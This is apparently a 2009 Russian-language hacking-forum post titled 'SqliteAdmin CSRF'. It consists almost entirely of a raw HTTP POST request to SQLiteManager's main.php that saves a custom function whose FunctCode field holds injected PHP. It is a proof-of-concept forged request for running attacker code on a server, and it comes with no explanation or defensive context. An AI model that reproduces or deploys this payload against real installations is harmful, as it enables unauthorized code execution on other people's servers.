13.07.2009, 00:06
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
С нами:
9010027
Репутация:
308
|
|
SqliteAdmin
CSRF
Код:
http://site/sqlitemanager/main.php?dbsel=1
POST /sqlitemanager/main.php?dbsel=1 HTTP/1.1
Host: 190.161.4.211
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3,
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://site/sqlitemanager/main.php?dbsel=1&function=IF&action=modify
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
FunctName=IF&FunctType=1&FunctCode=echo+%27test%27%3B%0D%0Afunction+sqliteIf%28%24compare%2C+%24good%2C+%24bad%29%7B%0D%0A++++if+%28%24compare%29+%7B%0D%0A++++++++return+%24good%3B%0D%0A++++%7D+else+%7B+%0D%0A++++++++return+%24bad%3B%0D%0A++++%7D%0D%0A%7D&FunctFinalCode=&FunctNumArgs=3&FunctAttribAll=1&function=IF&id=1&action=save
|
|
|